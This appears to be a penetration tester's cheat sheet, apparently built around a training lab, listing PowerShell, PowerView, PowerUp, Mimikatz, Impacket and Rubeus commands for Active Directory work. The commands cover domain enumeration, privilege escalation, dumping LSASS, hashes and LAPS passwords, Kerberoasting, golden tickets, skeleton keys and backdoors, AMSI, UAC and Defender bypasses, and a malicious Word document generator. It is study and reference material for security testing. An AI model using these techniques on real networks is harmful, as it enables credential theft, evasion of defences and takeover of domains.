| Tool | Command | Description | Links |
|---|---|---|---|
PowerShell | Get-Help | Shows brief help menu on the cmdlet | |
PowerShell | Get-Help process | Lists everything containing "process" | |
PowerShell | Get-Command -CommandType cmdlet | Lists all cmdlets | |
PowerShell | Get-Process | Lists running processes | |
PowerShell | PowerShell Execution Policy Bypass | Bypasses powershell execution policy | |
PowerShell | PowerShell AV Bypass Runner | ||
PowerShell | AMSI Bypass | Bypass AMSI | |
PowerShell | $ADClass = [System.DirectoryServices.ActiveDirectory.Domain]
$ADClass::GetCurrentDomain() | Enumerates the current domain | |
PowerShell | Download Cradles | Various possibilities to download files | |
PowerShell | Set-MpPreference | Disables Defender/Real time monitoring | |
PowerShell | Check for Constrained Language Mode | Check for Contrained Language mode | |
PowerShell | Fodhelper UACBypass | Registry command to bypass UAC | |
PowerShell | FodHelper AV Bypass and Workstation Takeover | Execution chain to take over computer | |
PowerShell | LSASS Dump with Comsvcs | Dump machine LSASS via Comsvcs and dump the contents offline | |
PowerShell | Reflection Shellcode Runner | Uses reflection in Powershell to invoke Win32 API calls in memory | |
PowerShell | AdminSDHolder Enumeration | Enumerates AdminSDHolder rights for users and if any groups are vulnerable | |
PowerShell | Sysvol Enumeration | Enumerate credentials and other information from Sysvol | |
PowerShell | LAPS Dump | Dumps the passwords for all local admin password solution credentials | |
PowerView | . .\PowerView.ps1 | Selects PowerView | |
PowerView | Get-NetUser | Shows Domain Users | |
PowerView | Get-NetUser | select -ExpandProperty samaccountname | Shows samaccountname properties of users | |
PowerView | Get-UserProperty | Gets User properties | |
PowerView | Find-UserField | Searches user fields for attributes in the AD description field (like passwords) | |
PowerView | Get-NetComputer | Enumerates domain member computers | |
PowerView | Resolve-IPAddress | Resolves a workstation name to the IP | |
PowerView | Get-NetDomain | Gets current Domain/Other Domain | |
PowerView | Get-DomainSID | Gets the Domain's SID | |
PowerView | Get-DomainPolicy | Gets the Domain Policy for the current domain | |
PowerView | Get-NetDomainController -Domain domain.local | Gets Domain Controllers for Domains | |
PowerView | Get-NetGroup | Shows Domain Admin group attributes | |
PowerView | Get-NetLocalGroup | List local groups on a machine | |
PowerView | Get-NetGroupMember -GroupName "Domain Admins" | Enumerates DA Group members | |
PowerView | Get-NetGroupMember -GroupName "Enterprise Admins" -Domain <domain name> | Enumerates Enterprise Admins in the root of a forest | |
PowerView | Get-NetLoggedon | Gets logged on users | |
PowerView | Invoke-ShareFinder -ExcludeStandard -ExcludePrint -ExcludeIPC -Verbose | Finds interesting shares | |
PowerView | Invoke-FileFinder | Finds sensitive files on computers in the domain | |
PowerView | Get-NetFileServer | Finds fileservers on the domain | |
Domain Enumeration - GPO | |||
PowerView | Get-NetGPOGroup -Verbose | Enumerate Restricted Groups from GPO | |
PowerView | Get-NetOU | Lists Organizational Units/OU's | |
PowerView | Get-NetOU <OUname> | %{Get-NetComputer -ADSPath $_} | Lists all computers in the OU | |
PowerView | Get-NetGPO | Shows names of GPOs | |
PowerView | Get-NetGPO -ADSpath 'LDAP://cn={3E04167E-C2B6-4A9A-8FB7-C811158DC97C},cn=policies,cn=system,DC=dollarcorp,DC=moneycorp,DC=local' | Enumerates GPO on StudentMachines OU | |
PowerView | Find-GPOComputer Admin | Finds users in local group who are admin | |
PowerView | Get-NetGPOGroup | Get GPOs which use Restricted Groups or groups.xml for interesting users | |
Domain Enumeration - ACL | |||
PowerView | Get-ObjectAcl | Enumerate Access Control Lists (ACLs) | |
PowerView | Get-PathACL | Get ACL's associated with a specific path | |
PowerView | Invoke-ACLScanner | Scans for ACLs | |
PowerView | Find-GPOLocation | Get machines where the given user is a member of a specific group | |
Domain Enumeration - Trusts | |||
PowerView | Get-NetDomainTrust | Get a list of all domain trusts for the current domain | |
PowerView | Get-NetForest | Get details about the current forest | |
PowerView | Get-NetForestDomain | Get all domains in the current forest | |
PowerView | Get-NetForestCatalog | Get all global catalogs for the current forest | |
PowerView | Get-NetForestTrust | Maps trusts of a forest | |
User Hunting | |||
PowerView | Find-LocalAdminAccess | ||
PowerView | Invoke-EnumerateLocalAdmin -Verbose | Find local admins on all domain machines | |
PowerView | Invoke-UserHunter | Finds computers where a user has a session | |
PowerView | Invoke-Command -ScriptBlock | ||
Privilege Escalation | |||
PowerUp | . .\PowerUp.ps1 | Loads PowerUp | |
PowerUp | Invoke-AllChecks | Checks for all common Priv Esc paths | |
PowerUp | Get-ServiceUnquoted -Verbose | Checks for Unquoted Service Paths | |
PowerUp | Get-ModifiableServiceFile -Verbose | Checks for services where the current user can write to its binary path or change binary arguments | |
PowerUp | Get-ModifiableService -Verbose | Gets services whose configurations the current user can modify | |
PowerUp | Invoke-ServiceAbuse | Uses the abuse function for Get-ModifiableService and adds current domain user to local admin group | |
Find Remoting Local Admin Access | |||
Find-PSRremotingLocalAdminAccess | . .\Find-PSRemotingLocalAdminAccess.ps1 | Loads the Module | |
Find-PSRremotingLocalAdminAccess | Find-PSRemotingLocalAdminAccess | Hunts for remote local admin access on other machines | |
Find-PSRremotingLocalAdminAccess | Enter-PSSession | Enters a PowerShell Remoting session | |
Script Block | Invoke-Command -ScriptBlock | Can run various scripts via PowerShell | |
PowerShell | Get-AppLockerPolicy | Enumerate AppLocker policies and restrictions | |
PowerView | AdminSDHolder | Can be used as a backdoor when SDPROP runs | |
Invoke-SDPropagator | Uses | ||
PowerView | PowerView_dev.ps1 Add-DomainGroupMember | Can be used to elevate privileges to DA or other group | |
Mimikatz | |||
Mimikatz | Invoke-Mimikatz | Dumps all essentially | |
Mimikatz | Dump NTLM hashes | Dump NTLM hashes | |
Mimikatz | Dump SAM file | Dump SAM file | |
Mimikatz | Create Golden Ticket | Requires a krbtgt ticket | |
Mimikatz | Create Silver Ticket | Service account ticket for accessing services themselves | |
Mimikatz | Create Skeleton Key | Persistence that allows access to any user with a single password | |
DAMP | Add-RemoteRegBackdoor | Creates a remote registry back door on the DC without DA privileges | |
Constrained/Unconstrained Delegation | |||
PowerView | Get-NetComputer -Unconstrained | Checks for unconstrained delegation in the domain | |
PowerView_Dev | Get-NetComputer -TrustedToAuth | Checks for constrained delegation in the domain | |
Get-ServiceAcl | Uses the Get-ServiceAcl.ps1 script | ||
Kerberoasting | |||
PowerView | PowerShell Get-NetUser -SPN | Looks for service principals on the network | |
Impacket | GetUserSPNs.py | Outputs service principal names and their Kerberos tickets | |
Rubeus | Rubeus kerberoast | Uses Rubeus to request SPNs and their associated ticket | |
ASREPRoasting | |||
Impacket | GetNPUsers.py | Uses Impacket to list ASREP roastable users and request tickets | |
Rubeus | Rubeus asreproast | Uses Rubeus to request ASREProastable accounts and requests tickets | |
OutWord | OutWord | Malicious Word Document generator | |
PowerShell Commands
PowerShell commands for enumerating Active Directory Environments - PowerShell, PowerView and other tools